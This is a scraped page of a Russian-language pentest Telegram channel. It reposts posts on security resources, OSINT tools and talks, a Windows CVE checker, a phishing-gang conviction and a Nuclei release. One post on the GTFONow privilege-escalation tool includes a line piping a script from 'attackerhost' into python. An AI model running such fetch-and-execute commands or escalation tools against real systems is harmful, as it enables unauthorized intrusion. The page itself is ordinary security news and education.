Fsecurity | HH
الذهاب إلى القناة على Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
إظهار المزيد2 062
المشتركون
لا توجد بيانات24 ساعات
+27 أيام
-930 أيام
أرشيف المشاركات
2 062
Repost from Не хакинг, а ИБ
🐱 Набор ресурсов по информационной безопасности
Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто заинтересован в получении дополнительной информации об информационной безопасности.
В репозитории вы найдете:
1. Анонимность
2. Основная информация о безопасности
3. Построение лаборатории для пентеста
4. Взлом автомобиля
5. OSINT
6. Фишинг
7. Социальная инженерия
8. Моделирование угроз и многое другое
«Как американцы с таким трудом усвоили в последнем столетии существования Земли, свободный поток информации является единственной гарантией от тирании. Некогда закованные в цепи люди, чьи лидеры, наконец, теряют контроль над информационным потоком, вскоре обретут свободу и жизненную силу, но свободная нация, постепенно сужающая свою власть над общественным дискурсом, начала свое стремительное сползание к деспотизму. Остерегайтесь того, кто откажет вам в доступе к информации, ибо в глубине души он мечтает стать вашим хозяином» - Комиссар Правин Лал🗄 Репозиторий – линк. // Не хакинг, а ИБ
2 062
Repost from Kali Linux
💻 В этом посте поговорим об инструменте `GTFONow`
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python
🖥 GTFONow
@linuxkalii2 062
Repost from Этичный Хакер
😈 OSINT: сборник докладов
В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведённом ниже списке мы рассмотрим основные методы и инструменты OSINT, которые могут помочь вам получить нужную информацию для различных целей - от исследования рынка до проверки подлинности фотографий и расследования преступлений.
— Мы также обсудим, как правильно проводить поиск в интернете, как анализировать информацию и как сохранять ее для дальнейшего использования, а также узнаете, как определить надежность источника информации, а также как избегать ложной информации.
1. OSINT: Введение в специальность
2. Общедоступная и неочевидная практика OSINT, методы и кейсы
3. OSINT в расследовании киберинцидентов
4. Shadow OSINT: information leaks usage
5. Боевой OSINT: когда открытых источников не хватает.
#OSINT #Recon | 🧑💻 Этичный хакер
2 062
Repost from Life-Hack - Хакер
Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных
В эпоху цифровой информации, умение эффективно собирать и анализировать данные из открытых источников становится критически важным навыком. Подборка пяти малоизвестных инструментов OSINT:
MetaDetective — этот простой в использовании инструмент анализирует метаданные файлов и извлекает из них важную информацию, включая имена создателей документов, пользователей, внесших изменения, и многие другие данные, которые могут быть скрыты в файле.
E4GL30S1NT — OSINT инструмент для сбора информации, включая данные из Facebook, поиск электронной почты, Google поиск, сведения о телефонных номерах, DNS и WHOIS запросы, а также трассировку IP.
Moriarty-Project — это инструмент, который предоставляет всестороннюю информацию о введенном номере телефона. Он не только пытается найти владельца номера, но и проверяет его на спам, комментарии, а также связанные социальные сети и поисковые отчеты.
dorks_hunter — он создан для выявления уязвимостей в веб-приложениях и для сбора информации о цели через google-доркинг,скрипт на питоне очень простой.
truffleHog — это инструмент, который просматривает git репозитории на предмет случайно загруженных ключей доступа, паролей и другой чувствительной информации.
LH | Новости | Курсы | Мемы
#подборка
2 062
У нас есть команда на HackTheBox ⚔️ Вы можете вступить, если хотите. Будете ?
2 062
Repost from Pentest HaT
🖼️ Moriarty v1.1
Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows
Поддерживаемые версии:
Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2) Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1) Windows Server 2016, 2019, 2022Список уязвимостей (35):
MS10-015 MS10-092 MS13-053 MS13-081 MS14-058 MS15-051 MS15-078 MS16-016 MS16-032 MS16-034 MS16-135 CVE-2017-7199 CVE-2019-0836 CVE-2019-0836 CVE-2019-1064 CVE-2019-1130 CVE-2019-1253 CVE-2019-1315 CVE-2019-1385 CVE-2019-1388 CVE-2019-1405 CVE-2020-0668 CVE-2020-0683 CVE-2020-0796 CVE-2020-1013 CVE-2020-1013 CVE-2021-26855 CVE-2021-26857 CVE-2021-26858 CVE-2021-27065 CVE-2021-44228 CVE-2021-36934 CVE-2022-40140 CVE-2022-22965 CVE-2023-36664👉 Описание уязвимостей Также бот поддерживает поиск эксплоитов по CVE
!poc CVE-2019-1064
💻 Home
Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack
#moriarty #checker #csharp
✈️ // Pentest HaT 🎩2 062
Repost from Не хакинг, а ИБ
🏴☠️ Осудили школьника, писавшего код для банды из 700 киберпреступников
Группа киберпреступников использовала фишинговые сайты для хищения денег с банковских карт.Мошенники действовали через онлайн-барахолки, представляясь покупателями и предлагая жертвам оплатить товар через поддельные страницы популярных маркет-плейсов. Введя данные своей карты для получения оплаты, пользователи, в итоге, теряли деньги на своих счетах. Примечательно, что ключевую роль в этой схеме играл несовершеннолетний кодер, ученик одной из минских школ. В течение полутора лет он занимался разработкой программного обеспечения, необходимого для поддержания и оптимизации деятельности всей киберкомпании.
Его действия были квалифицированы как хищение имущества путем модификации компьютерной информации.Молодой кодер, будучи частью организованной группы, смог украсть через фишинг более 24 тысяч рублей с карт потерпевших.
Исходя из доказательств, суд вынес приговор, согласно которому юноше назначено наказание в виде
5 лет лишения свободы в условиях общего режима исправительной колонии
.// Не хакинг, а ИБ
2 062
Repost from Pentester's Backlog
Вышла новая версия сканнера Nuclei (3.2.0). Теперь он умеет в фаззинг без танцев с бубном!
https://github.com/projectdiscovery/nuclei/releases/tag/v3.2.0
